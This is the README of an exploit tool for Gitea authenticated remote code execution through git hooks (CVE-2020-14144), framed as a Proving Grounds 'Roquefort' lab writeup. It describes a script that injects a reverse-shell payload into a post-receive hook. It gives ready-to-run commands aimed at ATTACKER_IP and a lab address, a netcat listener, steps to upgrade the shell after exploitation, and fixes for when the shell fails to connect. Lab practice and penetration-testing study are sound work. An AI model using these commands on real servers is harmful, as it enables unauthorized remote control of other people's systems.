Share
## https://sploitus.com/exploit?id=7975DB5A-1885-5501-B6E5-52A49C8288E0
# Gitea Git Hooks RCE (CVE-2020-14144)
> OffsecProvingGrounds Practice โ Roquefort Machine Writeup & POC
## Overview
| Item | Detail |
|------|--------|
| **Machine** | Roquefort (Proving Grounds Practice) |
| **OS** | Linux |
| **Gitea Version** | 1.7.5 |
| **CVE** | CVE-2020-14144 |
| **Vector** | Authenticated RCE via Git Hooks |
| **User Shell** | `chloe` |
Gitea versions **1.1.0 โ 1.12.5** allow authenticated users with *"May create git hooks"* permission to inject arbitrary shell commands into `post-receive` hooks. Pushing a commit triggers the hook and executes the payload on the server.
## Quick Start
### Automated (Python Script)
```bash
# Linux target โ reverse shell
python3 exploit.py -t http://TARGET:3000 -u test -p password123 -I ATTACKER_IP -P 4444 --os linux
# Windows target โ PowerShell reverse shell
python3 exploit.py -t http://TARGET:3000 -u test -p password123 -I ATTACKER_IP -P 4444 --os windows
```
### Manual
See [MANUAL.md](MANUAL.md) for step-by-step exploitation guide.
## Repository Structure
```
.
โโโ README.md # This file
โโโ MANUAL.md # Manual exploitation guide (Linux + Windows)
โโโ exploit.py # Automated exploit script
```
## Requirements
- Python 3.6+
- `requests` library (`pip install requests`)
- `git` installed on the attacker machine
- Valid Gitea credentials with git hook permissions
## Usage
```
usage: exploit.py [-h] -t TARGET -u USERNAME -p PASSWORD -I REV_IP -P REV_PORT
[--os {linux,windows}] [--repo REPO] [-f PAYLOAD_FILE] [-v]
Roquefort โ Gitea Authenticated RCE via Git Hooks (CVE-2020-14144)
required arguments:
-t, --target Target Gitea URL (e.g. http://192.168.x.x:3000)
-u, --username Gitea username
-p, --password Gitea password
-I, --rev-ip Attacker listener IP
-P, --rev-port Attacker listener port
optional arguments:
--os Target OS: linux (default) or windows
--repo Repository name to create (default: exploit)
-f, --payload-file Custom shell script payload file
-v, --verbose Verbose output
```
### Examples
```bash
# 1) Start listener
nc -lvnp 4444
# 2) Run exploit (Linux target)
python3 exploit.py -t http://192.168.103.67:3000 -u test -p password123 \
-I 192.168.45.168 -P 4444
# 3) Run exploit (Windows target)
python3 exploit.py -t http://192.168.103.67:3000 -u test -p password123 \
-I 192.168.45.168 -P 4444 --os windows
# 4) Custom payload file
python3 exploit.py -t http://192.168.103.67:3000 -u test -p password123 \
-I 192.168.45.168 -P 4444 -f payload.sh
```
## Shell Upgrade (Post-Exploitation)
After catching the reverse shell:
```bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# Ctrl+Z
stty raw -echo; fg
```
## Troubleshooting
| Problem | Solution |
|---------|----------|
| `fatal: dubious ownership` | Clone from `~` instead of shared folders, or run `git config --global --add safe.directory '*'` |
| No connection received | Verify attacker IP, check firewall, confirm both machines on same subnet |
| Hook fires but no shell | Test with `touch /tmp/pwned` payload first โ if file appears, reverse shell is being blocked |
| Permission denied on hooks | User lacks hook permissions โ needs admin or "May create git hooks" privilege |
| Port conflict on 3000 | Gitea uses 3000 โ use a different port like 4444 for your listener |
## References
- [CVE-2020-14144 โ NVD](https://nvd.nist.gov/vuln/detail/CVE-2020-14144)
- [Gitea Issue #13058](https://github.com/go-gitea/gitea/issues/13058)
- [p0dalirius Original POC](https://github.com/p0dalirius/CVE-2020-14144-GiTea-git-hooks-rce)
## Disclaimer
This tool is intended for authorized penetration testing and educational purposes only. Unauthorized access to computer systems is illegal. Use responsibly.